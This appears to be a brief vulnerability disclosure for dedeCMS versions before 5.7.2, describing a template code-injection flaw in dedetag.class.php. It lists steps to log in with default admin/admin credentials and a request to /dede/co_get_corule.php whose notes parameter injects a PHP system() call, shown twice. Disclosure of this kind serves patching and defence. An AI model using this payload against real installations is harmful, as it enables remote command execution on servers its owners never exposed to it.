BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.php
-
After install,Log in to the background
- Use the default account password admin/admin
-
Exploiting the Template
- Access the dede/co_get_corule.php interface
- Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command
-
Verifying the Exploit:
- If the injection is successful,The attacker will execute arbitrary commands
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command